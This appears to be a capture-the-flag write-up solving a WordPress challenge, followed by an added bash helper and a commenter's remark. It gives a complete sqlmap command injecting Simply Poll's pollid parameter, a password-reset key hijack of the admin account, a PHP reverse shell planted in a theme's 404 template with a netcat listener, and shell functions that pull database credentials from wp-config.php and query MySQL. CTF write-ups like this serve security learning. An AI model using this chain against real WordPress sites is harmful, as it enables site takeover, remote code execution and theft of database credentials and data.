Tags: sqli shell 

Rating:

Target is a WordPress installation running the plugin "Simply Poll 1.4.1", which is known to be SQL injectable via its pollid parameter.

Go to http://target/wp-login.php and request a password reset for 'admin', so that the user_activation_key field in wp_users gets populated.

Fire up sqlmap:

*sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="action=spAjaxResults&pollid=2" --dump -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3*

After a while sqlmap will dump the database (restricting the dump to the users table with -T wp_users keeps it short). Find the user_activation_key for admin, then go to http://target/wp-login.php?action=rp&login=admin&key=[the_user_activation_key],
set a new password for admin, then log in.

Caveat: WordPress 4.3 and later store the reset key hashed (as timestamp:hash) in user_activation_key, so the dumped value can no longer be pasted into the URL; this shortcut only works against older cores that store the raw key, which is why it works here.

Go to the theme editor and edit the 404 template of the twentyseventeen theme. Replace its contents with a PHP reverse shell such as https://github.com/mbs3c/wordy/blob/master/php-reverse-shell.php, set the IP and port of a box running a netcat listener (nc -lvnp [port]), save, then request http://target/wp-content/themes/twentyseventeen/404.php directly to trigger it.
In the reverse shell, navigate to /var/www/html and grep the DB connection parameters (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST) out of wp-config.php, then peek around MySQL. Don't try to run an interactive mysql shell: the reverse shell has no TTY, so the client will hang. Use '-e [cmd]' to run each statement non-interactively instead.

*mysql -uroot -pXXXXX -e 'show databases;'*

This shows there is an SHX database. Let's see what's inside:

*mysql -uroot -pXXXXX SHX -e 'show tables;'*

There should be just one table; select * from it and enjoy your flag.
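The wp-config.php parsing and the non-interactive mysql calls from the steps above, wrapped into two small shell functions so they can be pasted into the reverse shell in one go. This is an added example, not part of the original write-up or of WordPress; the wp-config.php it writes is constructed sample input (the credentials in it are placeholders), and the function names wp_config_value and wp_mysql are made up for this example.

```bash
#!/usr/bin/env bash
# Added example: pull the DB connection parameters out of wp-config.php and
# run MySQL statements with them non-interactively (-e), which is what works
# inside a reverse shell that has no TTY.
set -u

# Constructed sample config for testing; on the target the real file is
# /var/www/html/wp-config.php and the values will differ.
write_sample_config() {
  cat > "$1" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'XXXXX' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
EOF
}

# wp_config_value FILE KEY
# Prints the value of the PHP define( 'KEY', 'value' ); line in FILE.
# Handles optional whitespace and either quote style; assumes the value
# itself contains no quote characters (the common case).
wp_config_value() {
  local file="$1" key="$2"
  sed -n -E \
    "s/^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]${key}['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"][[:space:]]*\).*/\1/p" \
    "$file" | head -n 1
}

# wp_mysql FILE 'SQL'
# Runs one SQL statement with the credentials taken from FILE.
# -e avoids the interactive client, which needs a TTY the reverse shell
# doesn't provide.
wp_mysql() {
  local file="$1" sql="$2"
  local name user pass host
  name=$(wp_config_value "$file" DB_NAME)
  user=$(wp_config_value "$file" DB_USER)
  pass=$(wp_config_value "$file" DB_PASSWORD)
  host=$(wp_config_value "$file" DB_HOST)
  mysql -h "$host" -u "$user" -p"$pass" "$name" -e "$sql"
}

# Usage on the target (run after the functions are defined):
#   wp_mysql /var/www/html/wp-config.php 'show databases;'
#   wp_mysql /var/www/html/wp-config.php 'show tables from SHX;'
```

Running the queries through wp_mysql means the credentials never have to be retyped, and because every statement goes through -e, nothing in the chain needs a pseudo-terminal.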

tamas_dxwDec. 5, 2017, 7:28 p.m.

(or you can just ask sqlmap to discover all DBS, but where's the fun in that)